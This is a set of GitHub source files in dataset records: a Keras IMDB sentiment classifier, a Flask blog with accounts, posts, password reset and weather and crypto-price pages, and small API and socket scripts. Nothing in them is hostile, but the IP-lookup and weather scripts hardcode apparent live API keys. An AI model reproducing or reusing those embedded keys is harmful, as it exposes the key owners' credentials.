/>', ' ')\n tokens = doc.split()\n # remove punctuation from each token\n table = str.maketrans('', '', punctuation)\n tokens = [w.translate(table) for w in tokens]\n # filter out tokens\n tokens = [w for w in tokens if w in vocab]\n tokens = ' '.join(tokens)\n return tokens\n\n\ndef prepare(directory, vocab, num=False):\n documents = list()\n if num:\n i = 1\n for filename in listdir(directory):\n path = directory + '/' + filename\n doc = load_doc(path)\n tokens = clean_doc(doc, vocab)\n documents.append(tokens)\n if i >= num:\n break\n i += 1\n else:\n for filename in listdir(directory):\n path = directory + '/' + filename\n doc = load_doc(path)\n tokens = clean_doc(doc, vocab)\n documents.append(tokens)\n return documents\n" }, { "alpha_fraction": 0.6664648652076721, "alphanum_fraction": 0.6682808995246887, "avg_line_length": 27.482759475708008, "blob_id": "1be2c119171cbef85d957a6dae927cd925fe5bc1", "content_id": "f37788fa6a67658fbce09633f954145d3e4d4260", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1652, "license_type": "no_license", "max_line_length": 64, "num_lines": 58, "path": "/extract_vocab.py", "repo_name": "roseway/sentiment-analysis", "src_encoding": "UTF-8", "text": "from utils import load_doc\nfrom string import punctuation\nfrom nltk.corpus import stopwords\nfrom collections import Counter\nfrom os import listdir\n\nmin_occur = 2\ndoc_dir = ['data/Imdb/train/neg', 'data/Imdb/train/pos']\nsave_vocab = 'data/vocab.txt'\n\n\ndef clean_doc(doc):\n # split into tokens by white space\n doc = doc.replace('<br />', ' ')\n tokens = doc.split()\n # remove punctuation from each token\n table = str.maketrans('', '', punctuation)\n tokens = [w.translate(table) for w in tokens]\n # remove remaining tokens that are not alphabetic\n tokens = [word.lower() for word in tokens if word.isalpha()]\n # filter out stop words\n stop_words = set(stopwords.words('english'))\n tokens = [w for w in tokens if w not in stop_words]\n # filter out short tokens\n tokens = [word for word in tokens if len(word) > 1]\n return tokens\n\n\ndef add_doc_to_vocab(filename, vocab):\n # load doc\n doc = load_doc(filename)\n # clean doc\n tokens = clean_doc(doc)\n # update counts\n vocab.update(tokens)\n\n\ndef process_docs(directory, vocab):\n for filename in listdir(directory):\n # create the full path of the file to open\n path = directory + '/' + filename\n # add doc to vocab\n add_doc_to_vocab(path, vocab)\n\n\nprint(\"Extracting vocabulary\")\nvocab = Counter()\n# add all docs to vocab\nfor dire in doc_dir:\n process_docs(dire, vocab)\n# keep tokens with a min occurrence\ntokens = [k for k, c in vocab.items() if c >= min_occur]\n# convert lines to a single blob of text\ndata = '\\n'.join(tokens)\nfile = open(save_vocab, 'w', encoding='UTF-8')\nfile.write(data)\nfile.close()\nprint(\"Done\")\n" }, { "alpha_fraction": 0.7279050946235657, "alphanum_fraction": 0.7487725019454956, "avg_line_length": 36.030303955078125, "blob_id": "4d39613e39dc4a4a12e38184f0d6bf13ef44d285", "content_id": "fbbdfe5967ad037e51756783d8396cb801d03848", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2444, "license_type": "no_license", "max_line_length": 106, "num_lines": 66, "path": "/main.py", "repo_name": "roseway/sentiment-analysis", "src_encoding": "UTF-8", "text": "from utils import *\nimport numpy as np\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Flatten\nfrom keras.layers import Embedding\nfrom keras.layers.convolutional import Conv1D\nfrom keras.layers.convolutional import MaxPooling1D\nfrom keras.utils import to_categorical\n\nvocab_dir = 'data/vocab.txt'\nembedding_dir = 'data/glove.6B.300d.txt'\ntrain_dir = ['data/Imdb/train/neg', 'data/Imdb/train/pos']\ntest_dir = ['data/Imdb/test/neg', 'data/Imdb/test/pos']\n# The number of reviews wanna extract, use False to extract all\nnum = False\n\n# Get vocab\nvocab = load_doc(vocab_dir)\nvocab = set(vocab.split())\n\n# Prepare training data\nprint(\"Preparing training and test data\")\ntrain_docs = list()\nfor d in train_dir:\n train_docs += prepare(d, vocab, num)\ntokenizer = Tokenizer()\ntokenizer.fit_on_texts(train_docs)\nvocab_size = len(tokenizer.word_index) + 1\nencoded_docs = tokenizer.texts_to_sequences(train_docs)\nmax_length = max([len(s) for s in encoded_docs])\nXtrain = pad_sequences(encoded_docs, maxlen=max_length, padding='post')\nytrain = np.array([0 for _ in range(num if num else 12500)] + [1 for _ in range(num if num else 12500)])\nytrain = to_categorical(ytrain, num_classes=2)\n\n# Prepare test data\ntest_docs = list()\nfor d in test_dir:\n test_docs += prepare(d, vocab, num)\nencoded_docs = tokenizer.texts_to_sequences(test_docs)\nXtest = pad_sequences(encoded_docs, maxlen=max_length, padding='post')\nytest = np.array([0 for _ in range(num if num else 12500)] + [1 for _ in range(num if num else 12500)])\nytest = to_categorical(ytest, num_classes=2)\n\n# Using pre-trained word embedding\nprint(\"Loading Word Embedding\")\nwordlist = load_emb(embedding_dir, tokenizer.word_index)\nembedding_layer = Embedding(vocab_size, 300, weights=[wordlist], input_length=max_length, trainable=False)\n# Define model\nmodel = Sequential()\nmodel.add(embedding_layer)\nmodel.add(Conv1D(filters=128, kernel_size=5, activation='relu'))\nmodel.add(MaxPooling1D(pool_size=2))\nmodel.add(Flatten())\nmodel.add(Dense(2, activation='softmax'))\nmodel.summary()\n# Compile network\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n# Fit network\nmodel.fit(Xtrain, ytrain, epochs=20, verbose=1)\n\n# evaluate\nloss, acc = model.evaluate(Xtest, ytest, verbose=0)\nprint('Test Accuracy: %f' % (acc * 100))\n" } ]
4
ijmazur/pwpflask
https://github.com/ijmazur/pwpflask
6d6ef0120e2281581768a34cf6b94c6e80b4e3fe
6a2d212a34216714f5015eafa3a1512892e0ddd4
d8874f7b377ef92ffc78022a429ee5ac3c335758
refs/heads/main
2023-06-02T19:53:02.412854
2021-06-25T13:27:17
2021-06-25T13:27:17
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7092404365539551, "alphanum_fraction": 0.7189162969589233, "avg_line_length": 41.20408248901367, "blob_id": "e958611b4ee9f78cd86070efd273c8f01677432b", "content_id": "0e2d002e3c80beabace54b67b2eca86a7b818ada", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2067, "license_type": "no_license", "max_line_length": 110, "num_lines": 49, "path": "/flaskblog/users/utils.py", "repo_name": "ijmazur/pwpflask", "src_encoding": "UTF-8", "text": "import os\nimport secrets\nfrom PIL import Image\nfrom flask import url_for, current_app\nfrom flask_mail import Message\nfrom flaskblog import mail\n\n\n# random hex from secrets is a base for randomising name of picture, so it never hurts our db\n# we save the file with same extension as its uploaded (os - needed for that)\n# the filename.extension is split and we save the extension\n# we need to use _, as variable not used in our application (f_name)\n# we join the two in picture_fn = hexname + extension\n# picture_path = root app(package directory) and static/profile_pics and we add te picture filename we created\n# the picture cant be bigger than 125x125\ndef save_picture(form_picture):\n random_hex = secrets.token_hex(8)\n _, f_ext = os.path.splitext(form_picture.filename)\n picture_fn = random_hex + f_ext\n picture_path = os.path.join(current_app.root_path, 'static/profile_pics', picture_fn)\n\n output_size = (125, 125)\n i = Image.open(form_picture)\n i.thumbnail(output_size)\n\n i.save(picture_path)\n # to delete previous profile pic, while adding new one\n # prev_picture = os.path.join(app.root_path, 'static/profile_pics', current_user.image_file)\n # if os.path.exists(prev_picture) and os.path.basename(prev_picture) != 'default.jpg':\n # os.remove(prev_picture)\n return picture_fn\n\n\n# get_reset_token (main app models.py)\n # 1800 = 30minutes\n # into Serializer we pass in the secret_key\n # and we return token created with this serializer\n # we dump it with payload of userid, and we use our own self.id that the user resets\n # and we decode it with utf-8\n# we send the email message from [email protected] with reset token\ndef send_reset_email(user):\n token = user.get_reset_token()\n msg = Message('Password Reset Request', sender='[email protected]', recipients=[user.email])\n msg.body = f'''To reset your password, visit the following link:\n{url_for('users.reset_token', token=token, _external=True)}\n\nIf you did not make this request, then simply ignore this email and no changes will be made.\n'''\n mail.send(msg)" }, { "alpha_fraction": 0.6473520398139954, "alphanum_fraction": 0.6542056202888489, "avg_line_length": 33.1489372253418, "blob_id": "706018318fd6cd32bf0bf4016937f9337afe910d", "content_id": "58cc0a70c7cce37bef34a4773febf85bd3da4bf8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1605, "license_type": "no_license", "max_line_length": 105, "num_lines": 47, "path": "/flaskblog/weather/routes.py", "repo_name": "ijmazur/pwpflask", "src_encoding": "UTF-8", "text": "import configparser\nimport os\nimport requests\nfrom flask import render_template, Blueprint, request\n\nweather = Blueprint('weather', __name__)\n# OWM_API = os.environ.get('OWM_API')\n\n\n# asking what city we are looking for\[email protected](\"/weather\")\ndef weather_dashboard():\n return render_template('weather.html')\n\n\n# filtering through the JSON, getting what I need\[email protected](\"/weather-results\", methods=['POST'])\ndef get_results():\n cityname = request.form['cityname']\n api_key = get_api()\n data = what_weather(cityname, api_key)\n temp = \"{0:.2f}\".format(data[\"main\"][\"temp\"])\n feels_like = \"{0:.2f}\".format(data[\"main\"][\"feels_like\"])\n pressure = \"{0:.2f}\".format(data[\"main\"][\"pressure\"])\n humidity = \"{0:.2f}\".format(data[\"main\"][\"humidity\"])\n weathers = data[\"weather\"][0][\"main\"]\n location = data[\"name\"]\n lat = data[\"coord\"][\"lat\"]\n lon = data[\"coord\"][\"lon\"]\n country = data[\"sys\"][\"country\"]\n return render_template('weather-results.html', temp=temp, feels_like=feels_like,\n pressure=pressure, humidity=humidity, weather=weathers,\n location=location, lat=lat, lon=lon, country=country)\n\n\n# getting the API key from config.ini\ndef get_api():\n config = configparser.ConfigParser()\n config.read('flaskblog/weather/config.ini')\n return config['openweathermap']['api']\n\n\n# getting the JSON information\ndef what_weather(cityname, api_key):\n api_url = f\"http://api.openweathermap.org/data/2.5/weather?q={cityname}&units=metric&appid={api_key}\"\n r = requests.get(api_url)\n return r.json()\n" }, { "alpha_fraction": 0.531902015209198, "alphanum_fraction": 0.6598125100135803, "avg_line_length": 61.41509246826172, "blob_id": "65385b57632847234ddc1e7bd7764e820164a5c5", "content_id": "8b58f50f509f200ef9369257865f6047da58134c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3307, "license_type": "no_license", "max_line_length": 793, "num_lines": 53, "path": "/flaskblog/coins/routes.py", "repo_name": "ijmazur/pwpflask", "src_encoding": "UTF-8", "text": "from flask import render_template, request, Blueprint\nfrom flaskblog.models import Post\nimport os\nimport coinmarketcapapi\nimport json\nfrom bs4 import BeautifulSoup\nimport requests\nfrom types import SimpleNamespace\n\n#\ncoins = Blueprint('coins', __name__)\nCMP_API = os.environ.get('CMP_API')\n# cmc = coinmarketcapapi.CoinMarketCapAPI(CMP_API)\ncmc = requests.get('https://coinmarketcap.com/')\nsoup = BeautifulSoup(cmc.content, 'html.parser')\n\n#TODO use coingecko to\n# doing nothing :(\[email protected](\"/btc\")\ndef btc():\n return render_template('btc.html', title='BTC Info')\n\n\n# filtering through JSON :(\[email protected](\"/doge\")\ndef doge():\n data = '{\"DOGE\": {\"id\": 74,\"name\": \"Dogecoin\",\"symbol\": \"DOGE\",\"slug\": \"dogecoin\",\"num_market_pairs\": 376,\"date_added\": \"2013-12-15T00:00:00.000Z\",\"tags\": [\"mineable\",\"pow\",\"scrypt\",\"medium-of-exchange\",\"memes\",\"payments\"],\"max_supply\": \"None\",\"circulating_supply\": 129952951776.40607,\"total_supply\": 129952951776.40607,\"is_active\": 1,\"platform\": \"None\",\"cmc_rank\": 6,\"is_fiat\": 0,\"last_updated\": \"2021-06-09T10:23:03.000Z\",\"quote\": {\"EUR\": {\"price\": 0.2648561967893428,\"volume_24h\": 2679960884.4213257,\"percent_change_1h\": -0.91804719,\"percent_change_24h\": -2.86532626,\"percent_change_7d\": -23.78394102,\"percent_change_30d\": -38.38258941,\"percent_change_60d\": 411.89322012,\"percent_change_90d\": 487.94902906,\"market_cap\": 34418844569.04778,\"last_updated\": \"2021-06-09T10:23:17.000Z\"}}}} '\n x = json.loads(data, object_hook=lambda d: SimpleNamespace(**d))\n return render_template('doge.html', title='DOGE Info', value=x.DOGE)\n\n\n\n\n\n\"\"\"\ndata = '{\"BTC\": {\"id\": 1,\"name\": \"Bitcoin\",\"symbol\": \"BTC\",\"slug\": \"bitcoin\",\"num_market_pairs\": 9095,' \\\n '\"date_added\": \"2013-04-28T00:00:00.000Z\", \"tags\": [\"mineable\", \"pow\", \"sha-256\", \"store-of-value\", ' \\\n '\"state-channels\", \"coinbase-ventures-portfolio\", \"three-arrows-capital-portfolio\", ' \\\n '\"polychain-capital-portfolio\", \"binance-labs-portfolio\", \"arrington-xrp-capital\", ' \\\n '\"blockchain-capital-portfolio\", \"boostvc-portfolio\", \"cms-holdings-portfolio\", \"dcg-portfolio\", ' \\\n '\"dragonfly-capital-portfolio\", \"electric-capital-portfolio\", \"fabric-ventures-portfolio\", ' \\\n '\"framework-ventures\", \"galaxy-digital-portfolio\", \"huobi-capital\", \"alameda-research-portfolio\", ' \\\n '\"a16z-portfolio\", \"1confirmation-portfolio\", \"winklevoss-capital\", \"usv-portfolio\", ' \\\n '\"placeholder-ventures-portfolio\", \"pantera-capital-portfolio\", \"multicoin-capital-portfolio\", ' \\\n '\"paradigm-xzy-screener\"], \"max_supply\": 21000000, \"circulating_supply\": 18734943, \"total_supply\": ' \\\n '18734943, \"is_active\": 1, \"platform\": None, \"cmc_rank\": 1,\" \"is_fiat\": 0, \"last_updated\": ' \\\n '\"2021-06-14T21:06:09.000Z\", \"quote\": {\"EUR\": {\"price\": 33263.39097356716, \"volume_24h\": ' \\\n '40310312912.62971, \"percent_change_1h\": 0.99812804, \"percent_change_24h\": 2.44472236, ' \\\n '\"percent_change_7d\": 14\".80111402, \"percent_change_30d\": -16.67105913, \"percent_change_60d\": ' \\\n '-36.62361734, \"percent_change_90d\": -28.52918414, \"market_cap\": 623187733876.4954, \"last_updated\": ' \\\n '\"2021\"-06-14T21:07:18.000Z\"}}}} '\n y = json.loads(data, object_hook=lambda d: SimpleNamespace(**d))\n\"\"\"" }, { "alpha_fraction": 0.6757936477661133, "alphanum_fraction": 0.6876984238624573, "avg_line_length": 37.78461456298828, "blob_id": "5cfc0d4e692f96979e66f630fdb16c31a19c8a80", "content_id": "b2443853abfb461e8b69213814908856ba6a9dcc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2520, "license_type": "no_license", "max_line_length": 107, "num_lines": 65, "path": "/flaskblog/posts/routes.py", "repo_name": "ijmazur/pwpflask", "src_encoding": "UTF-8", "text": "from flask import render_template, url_for, flash, redirect, request, abort, Blueprint\nfrom flask_login import current_user, login_required\nfrom flaskblog import db\nfrom flaskblog.models import Post\nfrom flaskblog.posts.forms import PostForm\n\nposts = Blueprint('posts', __name__)\n\n\n# need to be logged in to create a post, if information inputted into the Form is correct we add and commit\[email protected](\"/post/new\", methods=['GET', 'POST'])\n@login_required\ndef new_post():\n form = PostForm()\n if form.validate_on_submit():\n post = Post(title=form.title.data, content=form.content.data, author=current_user)\n db.session.add(post)\n db.session.commit()\n flash('Your post has been created!', 'success')\n return redirect(url_for('main.home'))\n return render_template('create_post.html', title='New Post', form=form, legend='New Post')\n\n\n# if posts exists = id, otherwise 404, needed so we can delete and update posts\[email protected](\"/post/<int:post_id>\")\ndef post(post_id):\n post = Post.query.get_or_404(post_id)\n return render_template('post.html', title=post.title, post=post)\n\n\n# if post does not exist 404, otherwise proceed\n# if author is not the current logged in user = 403\n# otherwise, if information put into PostForm is valid, we accept the changes and flash message\[email protected](\"/post/<int:post_id>/update\", methods=['GET', 'POST'])\n@login_required\ndef update_post(post_id):\n post = Post.query.get_or_404(post_id)\n if post.author != current_user:\n abort(403)\n form = PostForm()\n if form.validate_on_submit():\n post.title = form.title.data\n post.content = form.content.data\n db.session.commit()\n flash('Your post has been updated!', 'success')\n return redirect(url_for('posts.post', post_id=post.id))\n elif request.method == 'GET':\n form.title.data = post.title\n form.content.data = post.content\n return render_template('create_post.html', title='Update Post', form=form, legend='Update Post')\n\n\n# if post doesnt exist 404, otherwise proceed\n# if author is not the current logged in user = 403\n# otherwise delete post, commit the db, flash message\[email protected](\"/post/<int:post_id>/delete\", methods=['POST'])\n@login_required\ndef delete_post(post_id):\n post = Post.query.get_or_404(post_id)\n if post.author != current_user:\n abort(403)\n db.session.delete(post)\n db.session.commit()\n flash('Your post has been deleted', 'success')\n return redirect(url_for('main.home'))" }, { "alpha_fraction": 0.6550302505493164, "alphanum_fraction": 0.6583287715911865, "avg_line_length": 43.925926208496094, "blob_id": "ed47ee4ce7c7f7cec72bacdaf6c342e13543450c", "content_id": "2ca1617376b7ac8efe3636fd5305f48f93e74e4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3638, "license_type": "no_license", "max_line_length": 115, "num_lines": 81, "path": "/flaskblog/users/forms.py", "repo_name": "ijmazur/pwpflask", "src_encoding": "UTF-8", "text": "from flask_wtf import FlaskForm\nfrom flask_wtf.file import FileField, FileAllowed\nfrom wtforms import StringField, PasswordField, SubmitField, BooleanField\nfrom wtforms.validators import DataRequired, Length, Email, EqualTo, ValidationError\nfrom flask_login import current_user\nfrom flaskblog.models import User\n\nclass RegistrationForm(FlaskForm):\n # input field for type string, receiving the name of the field and validator that data is required to make sure\n # its not empty + the length of the string between 2-20characters\n username = StringField('Username',\n validators=[DataRequired(), Length(min=2, max=20)])\n\n # we check if its a valid email address and we do that by import Email from wtf.validators\n email = StringField('Email',\n validators=[DataRequired(), Email()])\n password = PasswordField('Password', validators=[DataRequired()])\n\n # EqualTo - checking if we input the same password above\n confirm_password = PasswordField('Confirm Password',\n validators=[DataRequired(), EqualTo('password')])\n submit = SubmitField('Sign Up')\n\n # checking the db to see if the username and email already exists. if it does, we raise an error\n def validate_username(self, username):\n user = User.query.filter_by(username=username.data).first()\n if user:\n raise ValidationError('That username is taken. Please choose a different one')\n\n def validate_email(self, email):\n user = User.query.filter_by(email=email.data).first()\n if user:\n raise ValidationError('This email is already registered')\n\n\nclass LoginForm(FlaskForm):\n #username = StringField('Username',\n # validators=[DataRequired(), Length(min=2, max=20)])\n email = StringField('Email',\n validators=[DataRequired(), Email()])\n password = PasswordField('Password', validators=[DataRequired()])\n remember = BooleanField('Remember Me')\n submit = SubmitField('Login')\n\n\nclass UpdateAccountForm(FlaskForm):\n username = StringField('Username',\n validators=[DataRequired(), Length(min=2, max=20)])\n email = StringField('Email',\n validators=[DataRequired(), Email()])\n picture = FileField('Update Profile Picture', validators=[FileAllowed(['jpg', 'png'])])\n submit = SubmitField('Update')\n\n def validate_username(self, username):\n if username.data != current_user.username:\n user = User.query.filter_by(username=username.data).first()\n if user:\n raise ValidationError('That username is taken. Please choose a different one')\n\n def validate_email(self, email):\n if email.data != current_user.email:\n user = User.query.filter_by(email=email.data).first()\n if user:\n raise ValidationError('This email is already registered')\n\n\nclass RequestResetForm(FlaskForm):\n email = StringField('Email', validators=[DataRequired(), Email()])\n submit = SubmitField('Request Password Reset')\n\n def validate_email(self, email):\n user = User.query.filter_by(email=email.data).first()\n if user is None:\n raise ValidationError('There is no account with that email, you must register first')\n\n\nclass ResetPasswordForm(FlaskForm):\n password = PasswordField('Password', validators=[DataRequired()])\n confirm_password = PasswordField('Confirm Password',\n validators=[DataRequired(), EqualTo('password')])\n submit = SubmitField('Reset Password')" }, { "alpha_fraction": 0.7021276354789734, "alphanum_fraction": 0.7096032500267029, "avg_line_length": 47.98591613769531, "blob_id": "4854a955228a70ae6749b6985008145f50b979f8", "content_id": "b4d112caa9e049017bf4f52c848e5407e3266924", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3478, "license_type": "no_license", "max_line_length": 117, "num_lines": 71, "path": "/flaskblog/models.py", "repo_name": "ijmazur/pwpflask", "src_encoding": "UTF-8", "text": "from datetime import datetime\nfrom itsdangerous import TimedJSONWebSignatureSerializer as Serializer\nfrom flask import current_app\nfrom flaskblog import db, login_manager\nfrom flask_login import UserMixin\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User.query.get(int(user_id))\n\n\n# importing from db.Model\n# unique ID = column(type(int), primary_key=True (unique ID for our user)\n# username = has to be a string of max 20, unique, and cant be nullable\n# same for email and password, image_file\n# posts attribute is = relationship to our Post model, backref = author, lazy = True\n# backref is similar to adding another column to the Post Column, we get attribute who created the post\n# lazy defines when sqlalchemy loads the data, True = it loads it in one go (we can get all posts created by\n# individual user\nclass User(db.Model, UserMixin):\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(20), unique=True, nullable=False)\n email = db.Column(db.String(120), unique=True, nullable=False)\n image_file = db.Column(db.String(20), nullable=False, default='default.png')\n password = db.Column(db.String(60), nullable=False)\n posts = db.relationship('Post', backref='author', lazy=True)\n\n # 1800 = 30minutes\n # into Serializer we pass in the secret_key\n # and we return token created with this serializer\n # we dump it with payload of userid, and we use our own self.id that the user resets\n # and we decode it with utf-8\n def get_reset_token(self, expires_sec=1800):\n s = Serializer(current_app.config['SECRET_KEY'], expires_sec)\n return s.dumps({'user_id': self.id}).decode('utf-8')\n\n # verification of the above token, we make a Serializer object with SECRET_KEY again\n # its in a try except block due to the possibility that token might be expired or invalid\n # we try to get user_id by loading token and we try to get user_id out of that (user_id comes through payload)\n # if we do get user_id without throwing exception, we return the user.\n # if this method does not use self, we need to @staticmethod - telling python not to expect self parameter as arg\n @staticmethod\n def verify_reset_token(token):\n s = Serializer(current_app.config['SECRET_KEY'])\n try:\n user_id = s.loads(token)['user_id']\n except:\n return None\n return User.query.get(user_id)\n\n # dunder method (magic method) - how our object is printed, whenever we print it out.\n def __repr__(self):\n return f\"User('{self.username}', '{self.email}', '{self.image_file}')\"\n\n\n# same as above\n# date_posted = DateTime and we default from datetime.utcnow (without ()) because it would mean we want default rn\n# we want to pass the function as argument and not the date right now\n# we need username who posted the post, we get a ForeignKey id of user who created the post\n# in the User model we are referencing the actual Post class\n# in the user.id ForeignKey we are referencing the tablename and columnname in the db\nclass Post(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(100), nullable=False)\n date_posted = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n content = db.Column(db.Text, nullable=False)\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n\n def __repr__(self):\n return f\"Post('{self.title}', '{self.date_posted}')\"\n" }, { "alpha_fraction": 0.737300455570221, "alphanum_fraction": 0.7387518286705017, "avg_line_length": 24.518518447875977, "blob_id": "6d3fcde20ce76006cea753628307f6378d010dc9", "content_id": "fb3b2ae040512f83aba7bc0ce930e26382f4d16f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 689, "license_type": "no_license", "max_line_length": 171, "num_lines": 27, "path": "/README.md", "repo_name": "ijmazur/pwpflask", "src_encoding": "UTF-8", "text": "# PWPFlask\nSimple webapp which allows users to check weather, create/update/delete posts, update profile pictures, update account information. Reset password. Filter posts by users. \n\n## Table of content\n[About](#about)\\\n[Technologies](#technologies)\\\n[Future plans](#future-plans)\n\n# About\nApp based on OpenWeatherMap API, allows user to enter location and get current weather. \n\n# Technologies\n### Used in project:\n* Flask\n* Bootstrap 5\n* HTML\n* CSS\n\n### Future plans\nUse CoinGecko API to mimic trading of cryptocurrency. \n\n=======\nUse this command to run\\\n ```python run.py```\n\n---\n**Feel free to contact me if you have any questions, ideas or concerns about project/documentation.**\n" }, { "alpha_fraction": 0.486288845539093, "alphanum_fraction": 0.6946983337402344, "avg_line_length": 15.606060981750488, "blob_id": "ae0d7cc84abe2d7ec8ee0a1d1c259a34a9ca1c97", "content_id": "4dbf5dd1255fe2162af80ce800397897a55af5e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 547, "license_type": "no_license", "max_line_length": 23, "num_lines": 33, "path": "/requirements.txt", "repo_name": "ijmazur/pwpflask", "src_encoding": "UTF-8", "text": "bcrypt==3.2.0\nbeautifulsoup4==4.9.3\nblinker==1.4\ncertifi==2020.12.5\ncffi==1.14.5\nchardet==4.0.0\nclick==7.1.2\ncoinmarketcap==5.0.3\ndnspython==2.1.0\nemail-validator==1.1.2\nfastapi==0.65.1\nFlask==1.1.2\nFlask-Bcrypt==0.7.1\nFlask-Login==0.5.0\nFlask-Mail==0.9.1\nFlask-SQLAlchemy==2.5.1\nFlask-WTF==0.14.3\ngreenlet==1.1.0\ngunicorn==20.1.0\nidna==2.10\nitsdangerous==1.1.0\nJinja2==2.11.3\nMarkupSafe==1.1.1\nPillow==8.2.0\npycparser==2.20\nrequests==2.25.1\nsix==1.16.0\nSQLAlchemy==1.4.15\nsvgwrite==1.4.1\nTree==0.2.4\nurllib3==1.26.4\nWerkzeug==1.0.1\nWTForms==2.3.3" } ]
8
handelxh/python
https://github.com/handelxh/python
28ea57e1fa5bd35e5d91148eb7cff71ce5e9680d
3183fca68b686c794cf857d04af2c2345fb9f802
fd0f1daa3a9ae9a8db894988f90767fdd9a97dde
refs/heads/master
2016-09-05T12:39:35.462516
2014-09-09T02:00:35
2014-09-09T02:00:35
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.630630612373352, "alphanum_fraction": 0.6396396160125732, "avg_line_length": 17.5, "blob_id": "14f9348af256f6c9346a2eb873e59c0f010fe25d", "content_id": "f25217a1f505b9b6d77cec995aa5093b8fca06be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 111, "license_type": "no_license", "max_line_length": 42, "num_lines": 6, "path": "/find.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "import re\nf=open('./sinaweibo.py')\nb=re.findall(r'http://w{3}.*com',f.read())\nprint b\nf.close()\nprint f.read()\n" }, { "alpha_fraction": 0.6658986210823059, "alphanum_fraction": 0.7096773982048035, "avg_line_length": 24.52941131591797, "blob_id": "15ed2f769d6dabce86b9f1f74ae3edd2ea6b655f", "content_id": "5c183c9db24a9977be61c529be20ea2229ce3326", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 434, "license_type": "no_license", "max_line_length": 55, "num_lines": 17, "path": "/ipsearch.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "import urllib2\nimport urllib\nimport pprint\nimport json\nimport chardet\nurl = \"http://api.map.baidu.com/location/ip\"\nvalues = {\"ip\": \"211.71.92.202\", \"ak\":\n \"9L9g136CBV2bY9lBPMZeTLVU\", \"coor\": \"bd09ll\"}\ndata = urllib.urlencode(values)\n# print data\ntheurl = url + \"?\" + data\n# print theurl\nresponse = urllib2.urlopen(theurl)\nanswer = response.read()\n# answer=json.loads(answer,encoding=\"gbk\")\n# pprint.pprint(answer)\nprint answer\n" }, { "alpha_fraction": 0.7006507515907288, "alphanum_fraction": 0.7158351540565491, "avg_line_length": 27.8125, "blob_id": "e5ca22db38b4d4f885229f179956896f9e3eec1a", "content_id": "c834418b8ad7bf3143d961d24a502f7124f51b6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 461, "license_type": "no_license", "max_line_length": 84, "num_lines": 16, "path": "/天气查询.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "# coding=utf-8\nimport urllib2\nimport urllib\nimport pprint\nimport json\nurl=\"http://api.thinkpage.cn/v2/weather\"\nvalues={\"city\":\"beijing\",\"language\":\"en\",\"unit\":\"c\",\"aqi\":\"city\",\"key\":\"A70ZWYTRRT\"}\ndata=urllib.urlencode(values)\n# api=\"air.json\"\n# api=\"all.json\"\napi=\"suggestion.json\"\ntheurl=url+\"/\"+api+\"?\"+data\nresponse=urllib2.urlopen(theurl)\nanswer=json.loads(response.read())\n# pprint.pprint(answer['weather'][0]['air_quality']['city'])\npprint.pprint(answer)\n" }, { "alpha_fraction": 0.5981873273849487, "alphanum_fraction": 0.6193353533744812, "avg_line_length": 19.6875, "blob_id": "62dcd0fb192758b0807452911f72568a1ae33061", "content_id": "05ad665ef8215fed20f49fbb0764bb980b5aa244", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 331, "license_type": "no_license", "max_line_length": 44, "num_lines": 16, "path": "/socket/server.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "import socket\ndet = ('localhost', 8003)\nsock = socket.socket()\nsock.bind(det)\nsock.listen(5)\nconnection,address = sock.accept()\nwhile True:\n buf = connection.recv(3)\n if buf == '1':\n connection.send('welcome to server')\n elif buf == 'fuck':\n break\n else:\n connection.send('fuck off')\n\nsock.close()\n" }, { "alpha_fraction": 0.43103447556495667, "alphanum_fraction": 0.517241358757019, "avg_line_length": 13.625, "blob_id": "07ae2549482b83746cfa1ca733066ecd76a77a7b", "content_id": "dc5ac6fa4f37e61d3988ad59e1cc81e483b238d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 116, "license_type": "no_license", "max_line_length": 22, "num_lines": 8, "path": "/1.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "# a=[1,2,3,4,5,12,3,1]\n# print len(a)\n# b= set(a)\n# print b.__add__\n\nf=open(\"c:/1.txt\",'r')\nprint f.read()\nf.close()" }, { "alpha_fraction": 0.4083438813686371, "alphanum_fraction": 0.4487989842891693, "avg_line_length": 33.434783935546875, "blob_id": "286378e060a80f6c1d16798a28289679b0cfdaae", "content_id": "4b072e725fdf5c3d4139391e61d79681c485f86c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 791, "license_type": "no_license", "max_line_length": 135, "num_lines": 23, "path": "/lagou.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "# def check(a, dic, d):\n# answer 